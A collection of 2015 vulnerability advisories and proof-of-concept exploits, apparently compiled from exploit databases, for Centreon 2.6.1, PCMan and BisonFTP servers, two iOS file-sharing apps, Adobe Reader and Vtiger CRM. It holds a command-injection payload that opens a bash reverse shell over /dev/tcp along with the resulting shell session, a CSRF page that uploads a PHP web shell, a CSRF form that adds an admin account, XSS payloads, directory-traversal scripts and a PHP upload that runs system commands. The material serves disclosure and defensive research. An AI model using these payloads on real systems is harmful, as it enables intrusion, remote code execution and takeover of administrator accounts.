Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5256.php
20.08.2015
--
Request for non-existent username:
----------------------------------
POST /login.htm HTTP/1.1
Host: localhost:8080
Content-Length: 29
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/login.htm;jsessionid=6zpfpnxljyzf13l3zrpx9e0xd
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=6zpfpnxljyzf13l3zrpx9e0xd
username=noob&password=123123
Response:
- <td class="formError">User id not found</td>
Request for existent username:
------------------------------
POST /login.htm HTTP/1.1
Host: localhost:8080
Content-Length: 32
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/login.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=6zpfpnxljyzf13l3zrpx9e0xd
username=admin&password=123123
Response:
- <td colspan="3" class="formError">Invalid login<br/>
Centreon 2.6.1 Command Injection Vulnerability
Vendor: Centreon
Product web page: https://www.centreon.com
Affected version: 2.6.1 (CES 3.2)
Summary: Centreon is the choice of some of the world's largest
companies and mission-critical organizations for real-time IT
performance monitoring and diagnostics management.
Desc: The POST parameter 'persistant' which serves for making
a new service run in the background is not properly sanitised
before being used to execute commands. This can be exploited
to inject and execute arbitrary shell commands as well as using
cross-site request forgery attacks.
Tested on: CentOS 6.6 (Final)
Apache/2.2.15
PHP/5.3.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5265
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5265.php
10.08.2015
--
<<<<<<
root@zslab:~# curl -i -s -k -X 'POST' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-b 'PHPSESSID=bk80lvka1v8sb9ltuivjngo520' \
--data-binary $'host_id=14&service_id=19&persistant=1%27%22%600%26%2fbin%2fbash+-i+%3e+%2fdev%2ftcp%2f127.0.0.1%2f6161+0%3c%261+2%3e%261%60%27&duration_scale=s&start=08%2f17%2f2018&start_time=8%3a16&end=09%2f17%2f2018&end_time=10%3a16&comment=pwned&submitA=Save&o=as' \
'http://localhost.localdomain/centreon/main.php?p=20218'
>>>>>>
root@zslab:~# nc -4 -l -n 6161 -vv -D
Connection from 127.0.0.1 port 6161 [tcp/*] accepted
bash: no job control in this shell
bash-4.1$ id
id
uid=48(apache) gid=48(apache) groups=48(apache),494(centreon-engine),496(centreon-broker),498(centreon),499(nagios)
bash-4.1$ uname -a;cat /etc/issue
uname -a;cat /etc/issue
Linux localhost.localdomain 2.6.32-504.16.2.el6.x86_64 #1 SMP Wed Apr 22 06:48:29 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
Centreon Enterprise Server
Kernel \r on an \m
bash-4.1$ pwd
pwd
/usr/share/centreon/www
bash-4.1$ exit
exit
exit
root@zslab:~#
#################################################################
Centreon 2.6.1 Stored Cross-Site Scripting Vulnerability
Desc: Centreon suffers from a stored XSS vulnerability. Input
passed thru the POST parameter 'img_comment' is not sanitized
allowing the attacker to execute HTML code into user's browser
session on the affected site.
Tested on: CentOS 6.6 (Final)
Apache/2.2.15
PHP/5.3.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5266
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5266.php
10.08.2015
--
POST /centreon/main.php?p=50102 HTTP/1.1
Host: localhost.localdomain
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost.localdomain/centreon/main.php?p=50102&o=a
Cookie: PHPSESSID=qg580onenijim611sca8or3o32
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------951909060822176775828135993
Content-Length: 1195
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="directories"
upload
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="list_dir"
0
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="filename"; filename="phpinfo.php"
Content-Type: application/octet-stream
<?
phpinfo();
?>
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="img_comment"
"><script>alert(1);</script>
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="action[action]"
1
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="submitA"
Save
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2097152
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="img_id"
-----------------------------951909060822176775828135993
Content-Disposition: form-data; name="o"
a
-----------------------------951909060822176775828135993--
#################################################################
Centreon 2.6.1 Unrestricted File Upload Vulnerability
Desc: The vulnerability is caused due to the improper verification
of uploaded files via the 'filename' POST parameter. This can be
exploited to execute arbitrary PHP code by uploading a malicious
PHP script file that will be stored in the '/img/media/' directory.
Tested on: CentOS 6.6 (Final)
Apache/2.2.15
PHP/5.3.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5264
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5264.php
10.08.2015
--
<html>
<!-- Specified dir is 1337 and filename is shelly.php -->
<!-- Ex: http://localhost.localdomain/centreon/img/media/1337/shelly.php?c=id -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost.localdomain/centreon/main.php?p=50102", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------951909060822176775828135993");
xhr.withCredentials = true;
var body = "-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"directories\"\r\n" +
"\r\n" +
"1337\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"list_dir\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"filename\"; filename=\"shelly.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c?php\r\n" +
"echo \"\x3cpre\x3e\";system($_GET[\'c\']);echo \"\x3c\/pre\x3e\";\r\n" +
"?\x3e\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"img_comment\"\r\n" +
"\r\n" +
"peened\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"action[action]\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"submitA\"\r\n" +
"\r\n" +
"Save\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
"\r\n" +
"2097152\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"img_id\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------951909060822176775828135993\r\n" +
"Content-Disposition: form-data; name=\"o\"\r\n" +
"\r\n" +
"a\r\n" +
"-----------------------------951909060822176775828135993--";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
#################################################################
Centreon 2.6.1 CSRF Add Admin Exploit
Desc: The application allows users to perform certain actions
via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user
visits a malicious web site.
Tested on: CentOS 6.6 (Final)
Apache/2.2.15
PHP/5.3.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5263
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5263.php
10.08.2015
--
<html>
<body>
<form action="'http://localhost.localdomain/centreon/main.php?p=60301" method="POST">
<input type="hidden" name="contact_alias" value="Testingus" />
<input type="hidden" name="contact_name" value="Fullio" />
<input type="hidden" name="contact_email" value="test@test.tld" />
<input type="hidden" name="contact_pager" value="" />
<input type="hidden" name="contact_template_id" value="" />
<input type="hidden" name="contact_enable_notifications[contact_enable_notifications]" value="2" />
<input type="hidden" name="timeperiod_tp_id" value="" />
<input type="hidden" name="timeperiod_tp_id2" value="" />
<input type="hidden" name="contact_oreon[contact_oreon]" value="1" />
<input type="hidden" name="contact_passwd" value="123123" />
<input type="hidden" name="contact_passwd2" value="123123" />
<input type="hidden" name="contact_lang" value="en_US" />
<input type="hidden" name="contact_admin[contact_admin]" value="1" />
<input type="hidden" name="contact_autologin_key" value="" />
<input type="hidden" name="contact_auth_type" value="local" />
<input type="hidden" name="contact_acl_groups[]" value="31" />
<input type="hidden" name="contact_acl_groups[]" value="32" />
<input type="hidden" name="contact_acl_groups[]" value="34" />
<input type="hidden" name="contact_address1" value="Neverland" />
<input type="hidden" name="contact_address2" value="" />
<input type="hidden" name="contact_address3" value="101" />
<input type="hidden" name="contact_address4" value="" />
<input type="hidden" name="contact_address5" value="" />
<input type="hidden" name="contact_address6" value="" />
<input type="hidden" name="contact_activate[contact_activate]" value="1" />
<input type="hidden" name="contact_comment" value="comment-vuln-xss-t00t" />
<input type="hidden" name="action[action]" value="1" />
<input type="hidden" name="submitA" value="Save" />
<input type="hidden" name="contact_register" value="1" />
<input type="hidden" name="contact_id" value="" />
<input type="hidden" name="o" value="a" />
<input type="hidden" name="initialValues" value="a:0:{}" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#!/usr/bin/python
# title: PCMan FTP Server v2.0.7 Directory Traversal
# author: Jay Turla <@shipcod3>
# tested on Windows XP Service Pack 3 - English
# software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# description: PCMAN FTP 2.07 is vulnerable to Directory Traversal (quick and dirty code just for PoC)
from ftplib import FTP
ftp = FTP(raw_input("Target IP: "))
ftp.login()
ftp.retrbinary('RETR ..//..//..//..//..//..//..//..//..//..//..//boot.ini', open('boot.ini.txt', 'wb').write)
ftp.close()
file = open('boot.ini.txt', 'r')
print "[**] Printing what's inside boot.ini\n"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print file.read()
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
#!/usr/bin/python
# title: BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability
# author: Jay Turla <@shipcod3>
# tested on Windows XP Service Pack 3 - English
# software link: https://www.exploit-db.com/apps/081331edfc143738a60e029192b5986e-BisonFTPServer.rar
# description: BisonWare BisonFTP server product V3.5 is vulnerable to Directory Traversal (quick and dirty code just for PoC)
from ftplib import FTP
ftp = FTP(raw_input("Target IP: "))
ftp.login()
ftp.retrbinary('RETR ../../../boot.ini', open('boot.ini.txt', 'wb').write)
ftp.close()
file = open('boot.ini.txt', 'r')
print "[**] Printing what's inside boot.ini\n"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print file.read()
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
Document Title:
===============
My.WiFi USB Drive v1.0 iOS - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1589
Release Date:
=============
2015-09-24
Vulnerability Laboratory ID (VL-ID):
====================================
1589
Common Vulnerability Scoring System:
====================================
7.1
Product & Service Introduction:
===============================
My WiFi USB drive. Files can be uploaded with any browser. Start the WiFi Drive web server from application and connect to it using any browser.
Use the iPod/iPhone’s/iPad`s available disk space to carry any files. Use your iPhone as a normal shared network drive!
(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/my.wifi-usb-drive-+-free-pdf/id979512705 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a local file include vulnerability in the official My.WiFi USB Drive v1.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-09-24: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Jiyeon Lee
Product: My.WiFi USB Drive - iOS Mobile (Web-Application) 1.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official My.WiFi USB Drive v1.0 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
specific path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `Upload Files` module. Remote attackers are able to inject own files with malicious
`filename` values in the `Upload Files` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in
the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface`
in connection with the vulnerable upload files POST method request.
Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1.
Exploitation of the local file include web vulnerability requires no user interaction or privilege web-application user account.
Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Upload Files
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost/)
Proof of Concept (PoC):
=======================
The file include web vulnerability can be exploited by remote attackers without privilege web-application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Source
<tr class="row-file">
<td class="column-icon">
<button type="button" class="btn btn-default btn-xs button-open">
<span class="glyphicon glyphicon-folder-open"></span>
</button>
</td>
<td class="column-name"><p title="Click to rename..."
class="edit">"./[LOCAL FILE INCLUDE VULNERABILITY!]></p></td>
<td class="column-size">
--- PoC Session Logs [POST] ---
13:08:40.079[167ms][total 167ms] Status: 200[OK]
POST http://localhost:8080/upload Load Flags[LOAD_BYPASS_CACHE ] Größe des Inhalts[2] Mime Type[application/json]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/]
Content-Length[820]
Content-Type[multipart/form-data; boundary=---------------------------20192471318021]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
POST_DATA[-----------------------------20192471318021
Content-Disposition: form-data; name="path"
/
-----------------------------20192471318021
Content-Disposition: form-data; name="files[]"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]2.png"
Content-Type: image/png
---
13:08:42.198[75ms][total 75ms] Status: 200[OK]
GET http://localhost:8080/list?path=%2F[LOCAL FILE INCLUDE VULNERABILITY]2.png Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[692] Mime Type[application/json]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Server[GCDWebUploader]
Cache-Control[no-cache]
Content-Length[692]
Content-Type[application/json]
Connection[Close]
Date[Tue, 01 Sep 2015 11:17:22 GMT]
Reference(s):
http://localhost:8080/upload
http://localhost:8080/list?path=%2F
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and
disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks.
Encode the output in the file dir index list with the vulnerable name value to prevent application-side script code injection attacks.
Security Risk:
==============
The security risk of the local file include web vulnerability in the My.WiFi USB Drive app is estimated as high. (CVSS 7.1)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Document Title:
===============
Photos in Wifi v1.0.1 iOS - Arbitrary File Upload Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1600
Release Date:
=============
2015-09-28
Vulnerability Laboratory ID (VL-ID):
====================================
1600
Common Vulnerability Scoring System:
====================================
8.6
Product & Service Introduction:
===============================
Share the photos and videos of your iPhone/iPad in wifi. Upload photos and videos right to your camera roll without iTunes.
With Photos In Wifi, you can share your whole camera roll, and album, or a selection of photos and videos. Once the app
server is started, you can view, play and download the shared photos and videos from any computer or smartphone web browser.
You can also upload a photo, a video, or a zip file containing 100`s of photos and videos, right into your iPhone/iPad
camera roll. You can also use Photos In Wifi to send multiples full resolution photos and videos in a single email or MMS.
(Copy of the Homepage: https://itunes.apple.com/us/app/photos-in-wifi-share-photos/id966316576 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered an arbitrary file upload web vulnerability in the Photos in Wifi v1.0.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-09-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Sebastien BUET
Product: Photos In Wifi - iOS Mobile (Web-Application) 1.0.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
An arbitrary file upload web vulnerability has been discovered in the official Photos in Wifi v1.0.1 iOS mobile web-application.
The vulnerability allows remote attackers to upload an arbitrary (malicious) file to compromise the iOS wifi web-application.
The arbitrary file upload vulnerability is located in `Select a photo or a video to upload` module. Remote attackers are able to intercept
the vulnerable `filename` value in the `upload > submit` POST method request to compromise the mobile device or interface app. The attacker
can use a live session tamper for http to change the `filename` value to a webshell. After the upload the attacker requests the
`asset.php` file to execute the stored malicious file. The encoding of the `ext` value and the parse of the `filename` value is broken
which results obviously in this type behavior. The injection point of the issue is the upload POST method request with the vulnerable
filename value. The execution point occurs in the `assets.php` file when processing to display the images or videos. The upload file path
execution is not restricted (flag) and helps an attacker in case of exploitation to easily upload or access webshells.
Exploitation of the remote web vulnerability requires no user interaction and also no privileged web application user account.
Successful exploitation of the arbitrary file upload vulnerability results in web-server, web module, website or dbms compromise.
Vulnerable Module(s):
[+] ./assets-library://asset/
Vulnerable File(s):
[+] asset.php
Proof of Concept (PoC):
=======================
The arbitrary file upload vulnerability can be exploited by remote attackers without privilege web-application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Start the web-server (wifi)
2. Go to another computer and login by requesting via http localhost
3. Click upload and choose a random file
4. Start a live session tamper for http
5. Submit the upload to continue with the POST method request
6. Inject to the filename value a webshell code
7. Continue to reply the request
8. The server responds with 200OK
9. Open the poc url of the path to execute the webshell to compromise the mobile device or mobile app
10. Successful reproduce of the arbitrary file upload vulnerability!
PoC: URL
http://localhost/assets-library://asset/asset.php?id=40C9C332-857B-4CB8-B848-59A30AA9CF3B&ext=php
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost/
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[466583] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost/]
Connection[keep-alive]
Cache-Control[max-age=0]
POST-Daten:
POST_DATA[-----------------------------191201034430987
Content-Disposition: form-data; name="file"; filename="./[ARBITRARY FILE UPLOAD VULNERABILITY!]2.[ext]"
Content-Type: html
Status: 200[OK]
GET http://localhost/assets-library://asset/asset.php?id=250D47DB-57DD-47E4-B72A-CD4455B06277&ext=php
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Sa., 12 Sep. 2015 11:23:51 GMT]
Security Risk:
==============
The security risk of the arbitrary file upload web vulnerability in the wifi interface upload post method request is estimated as high. (CVSS 8.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
# Title: Adobe Acrobat Reader AFParseDate Javascript API Restrictions
Bypass Vulnerability
# Date: 09/28/2015
# Author: Reigning Shells, based off PoC published by Zero Day Initiative
# Vendor Homepage: adobe.com
# Version: Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before
11.0.11 on Windows and OS X are vulnerable.
# Tested on: Adobe Acrobat 11.0.10 on Windows 7
# CVE : CVE-2015-3073
This vulnerability allows remote attackers to bypass API restrictions on
vulnerable installations of Adobe Reader. User interaction is required to
exploit this vulnerability in that the target must visit a malicious page
or open a malicious file.
The specific flaw exists within AFParseDate. By creating a specially
crafted PDF with specific JavaScript instructions, it is possible to bypass
the Javascript API restrictions. A remote attacker could exploit this
vulnerability to execute arbitrary code.
Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before 11.0.11 on
Windows and OS X are vulnerable.
Notes:
The code assumes you attached a DLL named exploit.txt to the PDF document
to get around attachment security restrictions.
Acrobat will execute updaternotifications.dll if it's in the same directory
as the Acrobat executable or the same directory as the document being
opened.
Credit for discovery and the initial POC that illustrates code being
executed in the privileged context (launching a URL) goes to the Zero Day
Initiative.
Code:
https://github.com/reigningshells/CVE-2015-3073/blob/master/exploit.js
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38344.zip
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
# Exploit Title: Vtiger CRM <= 6.3.0 Authenticated Remote Code Execution
# Date: 2015-09-28
# Exploit Author: Benjamin Daniel Mussler
# Vendor Homepage: https://www.vtiger.com
# Software Link: https://www.vtiger.com/open-source-downloads/
# Version: 6.3.0 (and lower)
# Tested on: Linux (Ubuntu)
# CVE : CVE-2015-6000
# Source: http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html
=== Description ===
Vtiger CRM's administration interface allows for the upload of a company
logo. Instead of uploading an image, an attacker may choose to upload a
file containing PHP code and run this code by accessing the resulting
PHP file.
Detailed description:
http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html
=== PoC ===
Through a specially crafted HTTP-POST request, a PHP file is stored on
the server hosting the Vtiger CRM software:
POST /index.php HTTP/1.1
Host: [...]
Cookie: [...]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------51732462825208
Content-Length: 2040
-----------------------------51732462825208
Content-Disposition: form-data; name="__vtrftk"
[...]
-----------------------------51732462825208
Content-Disposition: form-data; name="logo"; filename="2.php"
Content-Type: image/jpeg
<? system('id; uname -a; /sbin/ifconfig -a'); system('cat ../../vtigerversion.php'); ?>
-----------------------------51732462825208
Content-Disposition: form-data; name="address"
[...]
The resulting PHP file can then be accessed at
[Vtiger URL]/test/logo/2.php
- --
Benjamin Daniel MUSSLER
Ix-Xgħajra, Malta Tel (MT) +356 9965 3798
Karlsruhe, Germany Tel (DE) +49 721 989 0150
Web: https://FL7.DE PGP: https://FL7.DE/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.21 (MingW32)
iQIcBAEBAgAGBQJWCVaeAAoJEAg0a3ng3v4f108P/0u+CUuUKSsSFiQt4S/HVAnw
5ykzNoZ/T1v0LUrItI1bZPeTyRr6VUandYclg68OM3VY0zc4x9161ScSlcnIitVO
AasvEw7mGguAR4Pe2i84LpPNvE6Bi+MJqU6vnBqZVmQMXUY8k+Mb0ufM/DMByLPj
dcozrAgI9ZQC3pnWiOPigD+gHe/AxY3Z1cxQLluOqBmMf7f3JXC+1dZt91EScuyi
lHNtd6/uRtHJKqBG8MZMXnq49OxTk7iiqQmb393RizPL0eI8FumwaCXTDnLgRwX3
7XQfmg3sCzT1jPSQB4/UYciePPOS4EREjDA/RW5ydtGRCkZPvmjUlfaFMwTjlCd1
dpRIRlzDBWUCVFIqkp2TGkrkbckA1hnehH1q64sQ4KopdKl0tPJ8yLumVr2Uvwtq
iLAbhQcn6+Cr9gctzOlrbj7BqY9uC0HfVdsl1qOCN5v3Yrbq7h/ToPnKGACLQN7t
